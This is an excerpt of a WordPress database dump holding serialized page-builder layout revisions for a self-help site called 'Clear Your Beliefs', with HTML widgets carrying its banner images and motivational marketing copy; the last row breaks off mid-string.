(1502, 1959, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:647:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}'),
(1503, 1960, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:647:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}}s:10:"grid_cells";a:4:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}}}'),
(1504, 1961, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:671:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}}s:10:"grid_cells";a:4:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}}}'),
(1505, 1962, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:671:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:238:"<div class="parg-text"><p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:3:{s:3:"src";s:72:"http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"5";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:7:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"3";}}}'),
(1507, 1963, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:671:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:476:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:7:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"3";}}}'),
(1509, 1964, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:671:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:7:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"3";}}}'),
(1511, 1965, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:671:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1513, 1966, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:671:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:3:{s:3:"src";s:73:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg";s:4:"href";s:65:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}}s:5:"grids";a:9:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:12:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:11;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}}}'),
(1515, 1967, 'panels_data', 'a:3:{s:7:"widgets";a:10:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:671:"<div class="quot" style="float: left; margin-top: 0px; margin-left: 70px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. 